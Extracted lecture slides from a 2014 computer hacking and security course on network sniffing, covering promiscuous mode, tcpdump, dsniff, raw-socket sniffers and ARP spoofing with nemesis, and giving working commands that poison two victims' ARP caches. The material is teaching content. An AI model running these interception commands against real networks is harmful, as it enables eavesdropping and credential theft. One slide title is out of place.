Nov 27, 2014 Sangwook Lee COM850 Computer Hacking and Security 0x440 Network Sniffing

Nov 27, 2014

Sangwook Lee

COM850 Computer Hacking and Secu-rity

0x440Network Sniffing

Table of Contents

• Network Sniffing

• Sniffing Tools

• ARP Spoofing

0X440 NETWORK SNIFFING

What is the Network Sniffing

The act of capturing pack-ets that aren’t necessarily meant for public viewing is

called SNIFFING


Two Sniffing Flows According to Network

• Non-switched network environment1. Setting the promiscuous mode 2. Packet-capturing

• Switched network environment1. ARP spoofing2. Packet-capturing


Non-switched vs. Switched Network

• The flow of traffic in a non-switched network (cont.)

It should be noted that step 3 and 4 can be reversed in or-der



• The flow of traffic in a non-switched network Step 1 Node A transmits a frame to Node CStep 2 Hub will broadcast this frame to active portSetp 3 Node B will receive the frame and will ex-amine the address in the frame. After determining that it is not the intended host, it will discard the frameStep 4 Node C will receive the frame and will ex-amine the address in the frame. After determining that it is the intended host. it will process the frame further



• The flow of traffic in a switched network (cont.)

How to generate Canary



• The flow of traffic in a switched networkStep 1 Node A transmits a frame to Node CStep 2 The switch will examine this frame and determine what the intended host is. It will then set up a connection between Node A and Node C so that they have a ‘private’ connectionSetp 3 Node C will receive the frame and will ex-amine the address. After determining that it is the intended host, it will process the frame further


Sniffing Non-switched Network

• For a host to be used as a sniffing agent,– NIC must be set to the promiscuous mode

After the promiscuous mode is set...

NIC no longer drop network frames which are addressed to

other hosts


Sniffing Non-switched Network

• Setting the promiscuous mode

$ sudo ifconfig eth0 promisc


Packet Capturing Tools

• Sniffers– tcpdump– dsniff

• Raw socket sniffer– raw_tcpsniff – pcap_sniff (with libpcap)– decode_sniff (with libpcap)


Sniffer: tcpdump

$ sudo tcpdump –X ‘ip host <victim IP>’


Sniffer: dsniff

$ sudo dsniff –n


Packet Capturing Tools

• Sniffers– tcpdump– dsniff

• Raw socket sniffer– raw_tcpsniff– pcap_sniff (with libpcap)– decode_sniff (with libpcap)


# Raw Socket

• Raw socket is an network socket that allows direct sending and receiving of Internet protocol packets without any protocol-specific transport layer for-matting

• Raw socket is specified by suing SOCK_RAW as the type

• There are multiple protocol options– IPPROTO_TCP, IPPROTO_UDP, IPROTO_ICMP


Raw Socket Sniffer: raw_tcpsniff

raw_tcpsniff.c


Raw Socket Sniffer: raw_tcpsniff

$ gcc –o raw_tcpsniff raw_tcpsniff.c

$ sudo ./raw_tcpsniff


Raw Socket Sniffer with Libpcap: pcap_sniff

pcap_sniff.c


Raw Socket Sniffer with Libpcap: pcap_sniff

$ gcc –o pcap_sniff pcap_sniff.c –lpcap

$ sudo ./pcap_sniff


Raw Socket Sniffer with Libpcap: decode_sniff

decode_sniff.c



decode_sniff.c

0X440 NETWORK SNIFFINGRaw Socket Sniffer with Libpcap:

Decode_sniff

decode_sniff.c



$ gcc –o decode_sniff decode_sniff.c –lpcap

$ sudo ./decode_sniff


Sniffing Switched Networks

• ARP spoofing

One of the basic operations of the Ethernet proto-col revolves around ARP (Address Resolution Proto-col) requests and replies. In general, when Node A wants to communicate with Node C on the network, it sends an ARP request. Node C will send an ARP reply which will include the MAC address. Even in a switched environment, this initial ARP request is sent in a broadcast manner. It is possible for Node B to craft and send an unsolicited, fake ARP reply to Node A. This fake ARP reply will specify that Node B has the MAC address of Node C. Node A will unwittingly send the traffic to Node B since it pro-fesses to have the intended MAC address.


Sniffing Switched Network

• ARP spoofing using NEMESIS (cont.)– Attacker• IP: 1.1.1.20• MAC: 00:00:00:BB:BB:BB

– Victim1• IP: 1.1.1.10• MAC: 00:00:00:AA:AA:AA

– Victim2• IP: 1.1.1.30• MAC: 00:00:00:CC:CC:CC



• ARP spoofing using NEMESIS (cont.)

$ sudo nemesis arp –v –r –d eth0 –S 1.1.1.10 –D 1.1.1.30 -h 00:00:00:BB:BB:BB -m 00:00:00:CC:CC:CC -H 00:00:00:BB:BB:BB -M 00:00:00:CC:CC:CC

$ sudo nemesis arp –v –r –d eth0 –S 1.1.1.30 –D 1.1.1.10 -h 00:00:00:BB:BB:BB -m 00:00:00:AA:AA:AA -H 00:00:00:BB:BB:BB -M 00:00:00:AA:AA:AA

Attacker (System B) → Victim2 (System C)

Attacker (System B) → Victim1 (System A)



• ARP spoofing using NEMESIS

ARP Cache of Victim1 (System A)

ARP Cache of Victim2 (System C)

the end

Documents

Nov 27, 2014 Sangwook Lee COM850 Computer Hacking and Security 0x440 Network Sniffing